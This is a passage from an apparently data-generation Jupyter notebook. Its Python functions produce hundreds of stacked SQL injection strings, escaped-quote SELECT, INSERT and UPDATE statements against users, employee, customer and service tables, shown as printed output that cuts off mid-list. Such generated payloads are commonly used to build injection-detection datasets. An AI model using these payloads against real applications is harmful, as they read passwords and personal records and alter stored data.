 '\\"; SELECT username FROM users#',
 '\\"; SELECT lname, nickname, work_background, address, email FROM employee# ',
 '\\"; SELECT password FROM users#',
 '\\"; SELECT lname, customer_id FROM customer-- ',
 '\\"; SELECT fname, email, lname, tel FROM customer#',
 '\\"; SELECT email, nickname, lname FROM employee# ',
 '\\"; SELECT graduation_certificate, tel, id_card, address, nickname, employee_id FROM employee-- ',
 '\\"; SELECT employee_id, fname, id_card, prefixname, email, nickname, graduation_certificate, address, lname, house_registration FROM employee#',
 '\\"; SELECT house_registration, fname, lname FROM employee-- ',
 '\\"; SELECT tel, lname, email FROM customer# ',
 '\\"; SELECT * FROM customer-- ',
 '\\"; SELECT customer_id, fname, tel FROM customer#',
 '\\"; SELECT tel FROM customer# ',
 '\\"; SELECT name FROM service-- ',
 '\\"; SELECT fname FROM employee# ',
 '\\"; SELECT work_background, prefixname FROM employee# ',
 '\\"; SELECT email, customer_id, fname, tel FROM customer#',
 '\\"; SELECT employee_id, nickname, id_card, lname, graduation_certificate, work_background, email, address FROM employee-- ',
 '\\"; SELECT tel, nickname, lname, prefixname FROM employee-- ',
 '\\"; SELECT prefixname, fname, nickname, address, house_registration FROM employee#',
 '\\"; SELECT customer_id FROM customer#',
 '\\"; SELECT email, customer_id FROM customer# ',
 '\\"; SELECT work_background, address, id_card, graduation_certificate, employee_id, prefixname FROM employee-- ',
 '\\"; SELECT fname, work_background, employee_id, tel, nickname, graduation_certificate, address, prefixname, lname, email, id_card FROM employee#',
 '\\"; SELECT address, nickname FROM employee# ',
 '\\"; SELECT id_card, nickname, work_background, tel, fname, email, employee_id, lname, address, house_registration, prefixname FROM employee# ',
 '\\"; SELECT customer_id, lname, fname, tel FROM customer-- ',
 '\\"; SELECT work_background, address, lname, prefixname, employee_id, id_card, graduation_certificate, tel, email FROM employee#',
 '\\"; SELECT fname, tel FROM customer# ',
 '\\"; SELECT email, tel, lname, fname FROM customer-- ',
 '\\"; SELECT graduation_certificate, id_card, email, work_background, employee_id, house_registration, lname, fname FROM employee-- ',
 '\\"; SELECT address, id_card, employee_id FROM employee-- ',
 '\\"; SELECT tel, prefixname, email, work_background, fname FROM employee#',
 '\\"; SELECT tel FROM employee# ',
 '\\"; SELECT address, prefixname, house_registration, lname, fname FROM employee#',
 '\\"; SELECT id_card, prefixname, lname, tel FROM employee# ',
 '\\"; SELECT nickname, graduation_certificate, house_registration, address, employee_id FROM employee-- ',
 '\\"; SELECT email, id_card, work_background, address FROM employee-- ',
 '\\"; SELECT employee_id, address, prefixname, graduation_certificate, email, house_registration, tel, lname FROM employee#',
 '\\"; SELECT id_card, prefixname, tel, house_registration, lname, fname, work_background, email, employee_id, nickname FROM employee# ',
 '\\"; SELECT tel, email FROM customer-- ',
 '\\"; SELECT nickname, fname, work_background, tel, prefixname, email, lname FROM employee-- ']

In [4]:
def randomInsertForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";'+" INSERT INTO " + random_table + "("
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in preStr:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
                
            preStr += random_table_value
            if j != numOfParam-1 :
                preStr += ", "
        preStr += ") VALUES ("
        for j in range(numOfParam) :

            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()
                
            preStr += random_string
            if j != numOfParam-1 :
                preStr += ", "
        preStr += ")" + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [5]:
randomInsertForSearch(table, table_value, last)

['\\"; INSERT INTO employee(id_card, prefixname, nickname, lname, tel, work_background, address, house_registration, graduation_certificate, employee_id, email) VALUES (1673419719824, "lHICXJBK", "TVDQQ", "fbSzbriPXauULX", 0929379753, "VhE5ulWSY", "vpY9mKkj", "8Tu256v", "jynePg6", "jytddPoYGNs", "QYD1eOCp")-- ',
 '\\"; INSERT INTO employee(house_registration, work_background, graduation_certificate, email, employee_id, lname, fname, id_card, nickname) VALUES ("FN6Ii1Bd", "0F6wLP", "hND1j9r5EoLb", "shZ4vc14STg", "vER5tcOjMwNm", "REHmrOIfhaS", "iJeT", 1905744672760, "hNQVcXiyeWWYxJL")# ',
 '\\"; INSERT INTO employee(fname, house_registration, nickname, email, address, lname, tel, graduation_certificate, employee_id, prefixname) VALUES ("zgbcZqqKfimW", "w98KSsn", "tLUtuBKceleoPDr", "KFDzzCV", "3BzrdPZoz3", "wSUDaDQsZrA", 0784496542, "WB4NSMuALOo62cr", "4yjEMIDQJFYd", "XEnqW")#',
 '\\"; INSERT INTO users(username) VALUES ("ajGjLpC")# ',
 '\\"; INSERT INTO users(password) VALUES ("Q6ZjU2NbhIXedW")#',
 '\\"; INSERT INTO employee(lname, house_registration, employee_id, prefixname, address, email, fname, id_card) VALUES ("kCPn", "JS0wxN0pKgS", "ZeL6hCYrNH9GGVQ", "BOuwGI", "JDjK", "LqcFJtwZfHugB1", "WevcjIbvoUJ", 1600799916538)#',
 '\\"; INSERT INTO employee(fname, employee_id, house_registration) VALUES ("NXCaKnGoUAE", "0dONiXHNdAcs7", "AfjbAt5i")-- ',
 '\\"; INSERT INTO service(name) VALUES ("Agsmjkq")# ',
 '\\"; INSERT INTO service(price) VALUES (059)# ',
 '\\"; INSERT INTO employee(lname, tel, employee_id, fname, house_registration, work_background) VALUES ("kgOi", 0514187250, "eymNSZidLBz0C5", "OgxbiXmTksadT", "cnfPvw84U1SGd", "vQg5IC1")-- ',
 '\\"; INSERT INTO employee(house_registration, tel, nickname, prefixname, work_background) VALUES ("fbw9yzn", 0403575315, "bPmscamfIy", "yBvkPnvNk", "Phj1EazWUyr4SM")#',
 '\\"; INSERT INTO users(password) VALUES ("peJ3dYdlaknd")# ',
 '\\"; INSERT INTO employee(lname, tel, house_registration, address, employee_id, prefixname) VALUES ("zbYapXBn", 0682522909, "zawW", "IleG2G4uIZld9", "O2WFw", "xfdvHRN")# ',
 '\\"; INSERT INTO employee(nickname, id_card, tel, email, work_background, fname, lname, address) VALUES ("GiHRUaZXeEfg", 1985343894753, 0692966673, "FaQnc", "7B923ET5", "EjqyoVTPlav", "rZRVXMQhVkvK", "NwFWqwrV")#',
 '\\"; INSERT INTO employee(work_background, fname, employee_id, prefixname, id_card, address, email, house_registration, nickname, lname, tel) VALUES ("uAZdjCwAO1xmt", "VlWRkjlfgYiYYB", "9hfzAGiEPpeoHa", "BFoMNYIohk", 1781605608662, "V0sDL4s", "YoTqis", "D9dF6V7", "dDzatZbRyS", "xmrqUOSf", 0212476605)# ',
 '\\"; INSERT INTO customer(fname, lname, customer_id) VALUES ("MpWqWZ", "IWsXSKNqiYxj", "P9APVEaPY")-- ',
 '\\"; INSERT INTO employee(graduation_certificate, address, id_card, nickname, prefixname, lname, email, house_registration) VALUES ("i5DdxljZ5", "OX1IXFLh", 1902163392291, "SRTVU", "ERBJXZBbeevMfnI", "zBfIgekFrVSI", "FuZhP4M6r", "fFuNJ1pGAhrqDN")-- ',
 '\\"; INSERT INTO service(price) VALUES (506)# ',
 '\\"; INSERT INTO customer(email, lname, tel) VALUES ("sdwcf", "SYhpOVC", 0400279539)-- ',
 '\\"; INSERT INTO users(password) VALUES ("q8g3")#',
 '\\"; INSERT INTO service(name) VALUES ("qErigVOEVw")#',
 '\\"; INSERT INTO employee(employee_id, lname, house_registration, nickname, fname, address, id_card, email, tel, graduation_certificate, work_background) VALUES ("UlwXC9PrbrfT", "bbLRTkgkxuiTBu", "0Zq1w6", "xOxX", "qDCLr", "2PnD", 1678002740780, "8fypXK1yKJjXWd", 0529700398, "5wF3", "CuUWO9X")#',
 '\\"; INSERT INTO service(name) VALUES ("tWyVlYsOjVz")-- ',
 '\\"; INSERT INTO employee(house_registration, prefixname, lname, graduation_certificate, nickname, email) VALUES ("07grXDQi", "magD", "VioyrBcKIYEphYh", "929lpWnOG9Ubl", "QEAGQXV", "tm3g357Ew")# ',
 '\\"; INSERT INTO customer(email, lname, tel, customer_id) VALUES ("6VDA9V1m1yHD1", "gEgjSlAyEGEprU", 0140751024, "HtBUjiwzHeAU")-- ',
 '\\"; INSERT INTO employee(id_card, address, fname, email, nickname, prefixname, employee_id, house_registration, graduation_certificate, work_background) VALUES (1635662380662, "L1wl8MVAkeDIlb", "soBiHaQoNiapSmK", "DeDjYxMazi", "akggeTQTfxnO", "LOBHTJjXchZ", "PnkUF", "tMYK", "UfEy", "BrjDh17kxtunC0")-- ',
 '\\"; INSERT INTO employee(prefixname, email, graduation_certificate, tel, lname, house_registration, address, nickname, id_card) VALUES ("aSRkXoJlu", "9XA1dJXYykt", "E7Rx", 0291391359, "enul", "om6w5", "cvA33G9pIaMNV6", "LgVok", 1712637025715)-- ',
 '\\"; INSERT INTO employee(fname) VALUES ("qGSYxElcgl")#',
 '\\"; INSERT INTO employee(email, work_background, graduation_certificate, fname, id_card, lname) VALUES ("i23K511dD7anzS", "mCPlUVxOTXC", "U1bo8duAC", "hqIVW", 1833302328535, "SDJP")#',
 '\\"; INSERT INTO employee(graduation_certificate, lname, work_background, house_registration) VALUES ("AJ66mdAmW24vOxm", "TLepR", "BulDsHXwfS", "tagBLH")#',
 '\\"; INSERT INTO customer(fname, lname, email) VALUES ("RwlbKxefJIVJH", "zavjEg", "uOFZiXU")# ',
 '\\"; INSERT INTO users(password) VALUES ("WEWywI2Txu3SH")#',
 '\\"; INSERT INTO users(username) VALUES ("HhIDKgzOrdrmbvd")-- ',
 '\\"; INSERT INTO service(name) VALUES ("vjquIFqNfWqeh")-- ',
 '\\"; INSERT INTO employee(fname) VALUES ("McNxPJL")-- ',
 '\\"; INSERT INTO service(price) VALUES (385)#',
 '\\"; INSERT INTO users(password) VALUES ("p1WwKw5tM")# ',
 '\\"; INSERT INTO employee(address) VALUES ("8ozxWqBrPMxK7")-- ',
 '\\"; INSERT INTO employee(tel) VALUES (0327673319)#',
 '\\"; INSERT INTO employee(employee_id, graduation_certificate, nickname) VALUES ("mH2vH2HE", "MSIZ5HB4uz21rG", "GdUnCBxmvuq")# ',
 '\\"; INSERT INTO service(price) VALUES (707)-- ',
 '\\"; INSERT INTO employee(work_background, nickname, lname, graduation_certificate, email, address) VALUES ("4O80qL", "SeXQAtNZY", "tVNlnVCpJFp", "QzP5zOSXez", "d6c4LV6s", "nNIL6bMwKX5")#',
 '\\"; INSERT INTO users(username) VALUES ("nuqawFknN")-- ',
 '\\"; INSERT INTO service(name) VALUES ("XMhtnHA")# ',
 '\\"; INSERT INTO customer(fname, lname) VALUES ("APhFXNYP", "lLWdaIhiB")-- ',
 '\\"; INSERT INTO customer(lname, fname) VALUES ("ORwxMSjsHTAC", "bliK")#',
 '\\"; INSERT INTO employee(address, id_card, employee_id, work_background, house_registration, fname, nickname) VALUES ("2GFXv5", 1543561414622, "XxOmttxTuxBA4s", "cHsmfNgzG", "VCKTUIOgaVR", "hPpRWkOZFmnVXP", "JccjBLEUQzv")# ',
 '\\"; INSERT INTO customer(customer_id, lname, tel, email) VALUES ("fqRzzPpU1", "dUvOQJNyzSXuJRS", 0826419300, "U6Az")# ',
 '\\"; INSERT INTO users(username) VALUES ("pzxxQAQYwvh")-- ',
 '\\"; INSERT INTO users(password) VALUES ("8a1lEzvSbCtf")-- ',
 '\\"; INSERT INTO customer(email) VALUES ("HPJ4fR1f8nXywcF")-- ',
 '\\"; INSERT INTO users(password) VALUES ("orC0USncWhkVC")# ',
 '\\"; INSERT INTO users(username) VALUES ("frRu")# ',
 '\\"; INSERT INTO customer(email, fname, tel) VALUES ("p1zsDvOsxm", "dPOBt", 0165639645)#',
 '\\"; INSERT INTO users(password) VALUES ("RtGCwHmCvRChyUo")-- ',
 '\\"; INSERT INTO customer(lname) VALUES ("Npja")# ',
 '\\"; INSERT INTO employee(work_background, nickname, email, prefixname, lname, tel, id_card, address, house_registration, fname) VALUES ("EZ2bCQEEQ", "BVDWWseyxBcTpu", "OzoOY6sbI", "bdiPjeLUq", "SNRzmhNKHEGjcww", 0433723216, 1835616133057, "IH7C", "3ruPHF", "VmcWTBVseIK")# ',
 '\\"; INSERT INTO service(name) VALUES ("uCHycWx")-- ',
 '\\"; INSERT INTO employee(address, fname, nickname, graduation_certificate, lname, email, id_card, prefixname, house_registration, employee_id) VALUES ("Ga2JS", "PmWtPPJScpMoNcO", "hLiTNih", "4ABCR1oGOcIuqw", "FFUDxqxxF", "YiJwJl2quBhFf", 1549087387782, "hIfl", "Nc8NzEq", "fATMYcyBV6Xph")# ',
 '\\"; INSERT INTO customer(customer_id, fname, email) VALUES ("L8ogcYlGhe", "rshjmnFpX", "AHKBuo")# ',
 '\\"; INSERT INTO service(name) VALUES ("twiWX")-- ',
 '\\"; INSERT INTO service(price) VALUES (197)# ',
 '\\"; INSERT INTO customer(lname, email) VALUES ("rwGWZ", "AzmHKPD")-- ',
 '\\"; INSERT INTO service(name) VALUES ("BPPyPY")# ',
 '\\"; INSERT INTO employee(fname, nickname, work_background) VALUES ("QWqXULFpaINk", "TLSu", "Mt2eRV")#',
 '\\"; INSERT INTO employee(graduation_certificate, prefixname, email, id_card) VALUES ("35YeAAAEn", "camLannCwmHTKso", "jcVG3", 1945111893355)-- ',
 '\\"; INSERT INTO employee(employee_id, work_background, house_registration, tel, address, nickname, graduation_certificate, id_card, fname, lname) VALUES ("DGIqfXxAFr6CXEz", "e6zqeMYjDIVM8Z", "kNnTT", 0116925663, "bVDnGHksy6wm", "APdqnsi", "u9sThLXNVLUHW4", 1706257921429, "fQGr", "OvsLC")-- ',
 '\\"; INSERT INTO users(username) VALUES ("aRPAhBSy")-- ',
 '\\"; INSERT INTO users(password) VALUES ("Ts7V")-- ',
 '\\"; INSERT INTO users(password) VALUES ("FvIkklE80")#',
 '\\"; INSERT INTO customer(lname, customer_id) VALUES ("UYNqEmMb", "YnU69")-- ',
 '\\"; INSERT INTO users(username) VALUES ("PDgQYHRjlSw")#',
 '\\"; INSERT INTO customer(email) VALUES ("arfmzJgLU")# ',
 '\\"; INSERT INTO users(username) VALUES ("hOdiliQRxwcmuL")# ',
 '\\"; INSERT INTO service(name) VALUES ("AtkyYQYQmT")# ',
 '\\"; INSERT INTO service(price) VALUES (277)# ',
 '\\"; INSERT INTO customer(email, tel, customer_id) VALUES ("CKhJ2ec6", 0992361647, "vLjurtzJw19CZ0Y")-- ',
 '\\"; INSERT INTO employee(work_background, prefixname) VALUES ("mLhZc9hFbMo", "fVWGVfgMuWwxkgc")-- ',
 '\\"; INSERT INTO users(username) VALUES ("nfJRi")# ',
 '\\"; INSERT INTO service(price) VALUES (831)-- ',
 '\\"; INSERT INTO users(username) VALUES ("bmPz")# ',
 '\\"; INSERT INTO customer(customer_id) VALUES ("0gDtdA")#',
 '\\"; INSERT INTO service(price) VALUES (908)# ',
 '\\"; INSERT INTO service(price) VALUES (079)-- ',
 '\\"; INSERT INTO employee(house_registration, address, work_background, tel, id_card, nickname, graduation_certificate, email, lname, fname) VALUES ("iQQXJ5NavpQ", "AWR2pYmoamT7E0D", "NCIApIlyk", 0430294224, 1628059216041, "WCsKzXoKlC", "Rr0Lz", "eZnrmYaMf", "TZNm", "pMPNynztpEp")-- ',
 '\\"; INSERT INTO customer(fname, tel, customer_id) VALUES ("LfIHZYc", 0924947853, "CYyO3ghKXX9V4s")-- ',
 '\\"; INSERT INTO employee(tel, nickname, lname, work_background, prefixname, id_card, house_registration, address, fname) VALUES (0955916796, "XfufLo", "BVwIKWEPF", "ZjiBnf8h", "EPgzCaNtIRoY", 1693343056523, "alJQD3Pna8pfg", "ZWRmrs", "szaGyjhLHXLoZs")#',
 '\\"; INSERT INTO service(name) VALUES ("bEXdSEOQq")-- ',
 '\\"; INSERT INTO users(username) VALUES ("cXgYgKZIozH")-- ',
 '\\"; INSERT INTO service(price) VALUES (119)# ',
 '\\"; INSERT INTO service(name) VALUES ("cYQMLQimbBMp")-- ',
 '\\"; INSERT INTO customer(email, customer_id, lname) VALUES ("xF4TOVLNcIi2fM", "mAd0RD", "lmIjcvDAwlE")#',
 '\\"; INSERT INTO customer(customer_id, lname, tel, fname) VALUES ("YSfmX6CFlhDJgh", "mKhIICkBqOtE", 0596491385, "IoTSgfIIwUqGCn")# ',
 '\\"; INSERT INTO service(name) VALUES ("QlkBdEN")#',
 '\\"; INSERT INTO employee(email, employee_id, house_registration, lname, id_card) VALUES ("utcLXsYANJVAqWF", "RfCRP9ES6Q50z", "cmHxKrt5g0", "ZGxDD", 1923190084769)#',
 '\\"; INSERT INTO users(username) VALUES ("cXRTDSD")#',
 '\\"; INSERT INTO customer(email) VALUES ("tUmIhoFX")# ',
 '\\"; INSERT INTO users(password) VALUES ("UZWE")#',
 '\\"; INSERT INTO service(price) VALUES (844)# ',
 '\\"; INSERT INTO customer(customer_id, tel, email, fname) VALUES ("EWLzV1Qk4RJu", 0414501910, "j4Wn5o1ADw7l16", "rluHufLNCECK")-- ',
 '\\"; INSERT INTO employee(nickname, address, lname, work_background, graduation_certificate, house_registration, fname) VALUES ("DVPydFKn", "lox7iDLIpbI", "ZCVCbMh", "ODXC8m47Y", "sV9CiyCxm5ocZ", "0uKKlaNvt1xgv", "byApOzfX")#',
 '\\"; INSERT INTO customer(tel) VALUES (0345079760)-- ',
 '\\"; INSERT INTO employee(fname, graduation_certificate, id_card, employee_id, tel, email, work_background, nickname, lname, house_registration, address) VALUES ("qJKbBxEWt", "lcKGbrkfOAuk", 1954679198137, "quGFVMDL940Cjzn", 0702763441, "TRcq", "evlbgyGM5GFe", "exKMimzBUSdlN", "iFTdUhi", "wORVKKsQ", "TvLmfykyuZSPdG")-- ',
 '\\"; INSERT INTO users(username) VALUES ("RHjFjWY")# ',
 '\\"; INSERT INTO users(username) VALUES ("EOPRQQnSNP")# ',
 '\\"; INSERT INTO users(username) VALUES ("rEjxbwNaiAt")-- ',
 '\\"; INSERT INTO users(username) VALUES ("ETCBKcVxDsBCp")# ',
 '\\"; INSERT INTO users(username) VALUES ("hHvh")# ',
 '\\"; INSERT INTO customer(customer_id) VALUES ("zfnzLXil5")-- ',
 '\\"; INSERT INTO employee(fname, tel, lname, prefixname, id_card, graduation_certificate, nickname, email, address, house_registration) VALUES ("mWhmrSAAiqWkJE", 0731887968, "dsYv", "GCSFzo", 1865107758967, "kr36vdpsg91k", "XtbRVBeInZxALCK", "M7lC1OaF7gXxa", "NSm4Ao", "8rTIivnxqd9kiV")-- ',
 '\\"; INSERT INTO service(price) VALUES (695)# ',
 '\\"; INSERT INTO employee(lname, tel, house_registration, prefixname, email, nickname) VALUES ("JcgfsNnaiU", 0704325059, "12YTM", "LOYNx", "JI6e3G6JJGx", "PTneAFZLbg")-- ',
 '\\"; INSERT INTO service(name) VALUES ("pDlQTnb")# ',
 '\\"; INSERT INTO service(price) VALUES (007)-- ',
 '\\"; INSERT INTO service(name) VALUES ("dbKafkGYrJgEiH")-- ',
 '\\"; INSERT INTO service(price) VALUES (332)# ',
 '\\"; INSERT INTO service(price) VALUES (798)-- ',
 '\\"; INSERT INTO employee(address, house_registration, work_background) VALUES ("j4sNJdY2Ii9", "mQt9z0", "RrR7pPyhQLKo")# ',
 '\\"; INSERT INTO service(name) VALUES ("RTBwZLEouf")# ',
 '\\"; INSERT INTO service(name) VALUES ("MABvohSWcuprM")-- ',
 '\\"; INSERT INTO customer(tel, fname, customer_id) VALUES (0726589938, "qziLD", "LadclZXKZyjmftD")#',
 '\\"; INSERT INTO users(username) VALUES ("KfwzdUgg")#',
 '\\"; INSERT INTO customer(tel, lname, fname) VALUES (0622321220, "BlUozzhgp", "WPvejUU")#',
 '\\"; INSERT INTO users(username) VALUES ("HplNcvRBOLAddj")# ',
 '\\"; INSERT INTO users(username) VALUES ("grPCPFdO")# ',
 '\\"; INSERT INTO users(password) VALUES ("zaFPYz")#',
 '\\"; INSERT INTO users(username) VALUES ("lsMkMnOKf")# ',
 '\\"; INSERT INTO users(password) VALUES ("RKy2FoL8k50")#',
 '\\"; INSERT INTO service(price) VALUES (512)# ',
 '\\"; INSERT INTO employee(graduation_certificate, lname, id_card, house_registration, work_background, address, employee_id, fname, nickname) VALUES ("mgckiviQrUl", "bRYfEezqrWkACWh", 1651418835767, "2LqZ", "LM6y51aYyqnU", "KXDlVHg", "I9vvG2DAt0vz", "FKKBsC", "CXWcoMV")#',
 '\\"; INSERT INTO employee(id_card, work_background, lname, house_registration, nickname) VALUES (1791402750961, "YtWF6PbcQu", "dHEHUz", "GqdFM", "CIjMMtPy")#',
 '\\"; INSERT INTO service(price) VALUES (836)# ',
 '\\"; INSERT INTO service(name) VALUES ("DdsFdZEup")#',
 '\\"; INSERT INTO employee(employee_id, nickname, address, house_registration, graduation_certificate, tel, email, lname, fname) VALUES ("ZskaoN", "WSjbriRIC", "D6HYaHjC8ma4VM", "IZ7Rue2M9Q", "P2L6cggtVr5", 0831740951, "B6VHOTuRRhqHD", "ikzXa", "EmdiwHjk")#',
 '\\"; INSERT INTO service(name) VALUES ("ZKJwnyvVX")-- ',
 '\\"; INSERT INTO service(name) VALUES ("WnUEuEcGZfc")-- ',
 '\\"; INSERT INTO customer(tel, lname) VALUES (0157627735, "fgQf")-- ',
 '\\"; INSERT INTO service(name) VALUES ("zWpEVMkpb")# ',
 '\\"; INSERT INTO service(name) VALUES ("PDBOXlrCidn")-- ',
 '\\"; INSERT INTO users(password) VALUES ("Q4pBpeappL")# ',
 '\\"; INSERT INTO service(name) VALUES ("oDaanlBkpcH")#',
 '\\"; INSERT INTO customer(customer_id) VALUES ("j1UJABNL")# ',
 '\\"; INSERT INTO customer(fname, lname) VALUES ("NmBi", "iXXESObQkIewdt")#',
 '\\"; INSERT INTO customer(customer_id, fname) VALUES ("RodaDJkQv", "fuVdWG")-- ',
 '\\"; INSERT INTO customer(customer_id, email, tel, lname) VALUES ("IK4q0QNd", "K40uuhu6t0wC2c", 0517355375, "wVQdO")#',
 '\\"; INSERT INTO employee(house_registration, graduation_certificate, prefixname, id_card, fname, nickname, tel) VALUES ("G6BVYQ", "44AuM", "ZbrZVjZaE", 1518169819215, "McCeoT", "ZYjaKIIoHOgppZI", 0972387036)# ',
 '\\"; INSERT INTO customer(email, lname) VALUES ("SP6orIB", "LlpqG")-- ',
 '\\"; INSERT INTO service(name) VALUES ("HeHhOMMDDbk")#',
 '\\"; INSERT INTO users(password) VALUES ("rstnmQAT")-- ',
 '\\"; INSERT INTO users(password) VALUES ("oRsoDkKS0mZw")#',
 '\\"; INSERT INTO users(password) VALUES ("PCPxotTpMpHXu")#',
 '\\"; INSERT INTO users(password) VALUES ("QmxTSRSEPsmSbJ")# ',
 '\\"; INSERT INTO service(price) VALUES (177)#',
 '\\"; INSERT INTO customer(lname) VALUES ("aabfKPbxdLlj")#',
 '\\"; INSERT INTO service(price) VALUES (814)# ',
 '\\"; INSERT INTO users(username) VALUES ("oJjCKfwFqW")# ',
 '\\"; INSERT INTO users(username) VALUES ("UZJMxHHEH")#',
 '\\"; INSERT INTO service(name) VALUES ("SgbyhpclBvMw")-- ',
 '\\"; INSERT INTO customer(fname, lname, tel) VALUES ("dxTZbFMoG", "DTVkqZvLQrW", 0498933214)# ',
 '\\"; INSERT INTO customer(email, customer_id, fname) VALUES ("6c7FKSjyDA5R", "zRp8un", "sVsbkRHS")# ',
 '\\"; INSERT INTO service(price) VALUES (836)#',
 '\\"; INSERT INTO customer(fname, tel) VALUES ("cYLhALRiIolk", 0250312341)-- ',
 '\\"; INSERT INTO employee(house_registration, nickname, work_background, address) VALUES ("O9DH7fAk", "AmjsgLdbXs", "BeXLeQZeiaOqQ", "QkxvFCoyFTQmFn")# ',
 '\\"; INSERT INTO employee(tel, lname, nickname, fname, house_registration, work_background, employee_id, address, id_card) VALUES (0816486897, "MQWXQQ", "FiyZD", "nHBJlxobLYhyr", "qTTg30a77K2e", "V3so1aWHYpTr", "zU9XeNWbtY5S", "Ro8RQpspN8j4Ae", 1590516785046)#',
 '\\"; INSERT INTO users(password) VALUES ("TWxQ3H1KR")#',
 '\\"; INSERT INTO employee(tel, prefixname, graduation_certificate) VALUES (0649896135, "vmETt", "zTZo6RRmHN0")# ',
 '\\"; INSERT INTO users(password) VALUES ("Fi5La")#',
 '\\"; INSERT INTO customer(tel) VALUES (0589379361)-- ',
 '\\"; INSERT INTO users(username) VALUES ("BtHEHt")# ',
 '\\"; INSERT INTO users(password) VALUES ("4rozZimcx")# ',
 '\\"; INSERT INTO employee(email, lname, nickname, tel, house_registration, fname, address, employee_id) VALUES ("Dop5UFEJi", "AqNdGrTeCjv", "mvZFwElKG", 0895275285, "nwTUNGt", "RmemnTkpADJgK", "vkwAH5u7yVM", "zJsV")# ',
 '\\"; INSERT INTO service(price) VALUES (158)-- ',
 '\\"; INSERT INTO service(price) VALUES (994)# ',
 '\\"; INSERT INTO service(price) VALUES (399)-- ',
 '\\"; INSERT INTO service(price) VALUES (118)#',
 '\\"; INSERT INTO customer(fname, customer_id) VALUES ("CWrpLaEaFfcHhq", "wk6mDP")-- ',
 '\\"; INSERT INTO service(name) VALUES ("fJhUEnwlYEXyj")-- ',
 '\\"; INSERT INTO employee(nickname, fname, tel, id_card, address, house_registration, graduation_certificate, work_background, email, lname, prefixname) VALUES ("bOlX", "QynFMpeXHZ", 0871619170, 1818517244327, "Wl6gWmADPnarg7", "9gowa", "AcTTmQ", "l2fdZ6", "0UEk3OxQres0", "ZJyve", "TJpwfxzgInIIvB")-- ',
 '\\"; INSERT INTO users(username) VALUES ("JGeKTspLue")#',
 '\\"; INSERT INTO service(name) VALUES ("GqOLEtFhjs")-- ',
 '\\"; INSERT INTO users(username) VALUES ("zySA")-- ',
 '\\"; INSERT INTO employee(lname, fname, tel, house_registration, address, id_card) VALUES ("HLje", "FkeYTjoNCXb", 0240401811, "yKcOv", "6u2qBOqbS9Xr", 1594356714288)#',
 '\\"; INSERT INTO users(username) VALUES ("OEqXkyml")# ',
 '\\"; INSERT INTO service(price) VALUES (343)# ',
 '\\"; INSERT INTO users(password) VALUES ("E6qeC4Sq9BTK")# ',
 '\\"; INSERT INTO service(name) VALUES ("KIjetSiCf")# ',
 '\\"; INSERT INTO customer(tel, fname) VALUES (0391764593, "RGvgLQISAdKGZbo")#',
 '\\"; INSERT INTO service(name) VALUES ("eMCB")#',
 '\\"; INSERT INTO users(username) VALUES ("lIGGRIpJ")# ',
 '\\"; INSERT INTO users(username) VALUES ("uYqlITVDq")#',
 '\\"; INSERT INTO employee(prefixname, address, house_registration, nickname, employee_id, fname) VALUES ("adxpkdFmyPAB", "lUtjS38", "JUXh0AKp", "pditgJJvA", "9b9MeMDL", "UAcDbyv")# ',
 '\\"; INSERT INTO users(password) VALUES ("vdHyAA876eb")# ',
 '\\"; INSERT INTO employee(employee_id, work_background, tel) VALUES ("rXCJNSwsex3VVm", "cNzrQsSfNn", 0387724288)#',
 '\\"; INSERT INTO employee(work_background, address, fname, lname) VALUES ("dpLOuzAhBB5Jqn", "CCzb", "ysklDkyne", "hhlcNntfu")-- ',

In [6]:
def randomUpdateForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";' + " UPDATE " + random_table + " SET "
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in preStr:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
            
            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()

            preStr += random_table_value + " = " + random_string
            if j != numOfParam-1 :
                preStr += ", "
        random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first2 = type_of_value[random_table_value2]

        random_string2=""
        if first2 == "tel":
            random_string2 = generate_random_string_tel()
        elif first2 == "price":
            random_string2 = generate_random_string_price()
        elif first2 == "id_card":
            random_string2 = generate_random_string_id_card()
        elif first2 == "str":
            random_string2 = generate_random_string_str()
        elif first2 == "both":
            random_string2 = generate_random_string_both()
            
        preStr += " WHERE " + random_table_value2 + " = " + random_string2 +random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
        
    return gen

In [7]:
randomUpdateForSearch(table, table_value, last)

['\\"; UPDATE customer SET email = "1gIoGSQL8", fname = "eldaIVAvmiBnB" WHERE email = "uknf0xkVhXj6"# ',
 '\\"; UPDATE service SET name = "GPEPatWUW" WHERE name = "JmBvjhTDjYofC"-- ',
 '\\"; UPDATE employee SET address = "rCYTNoItXN", id_card = 1651770015196, email = "ZLrZ37JKr", work_background = "bbDabQ5qaBQZ", house_registration = "cIgH0l9znu7W", employee_id = "jYWP7GG" WHERE nickname = "iBybHk"#',
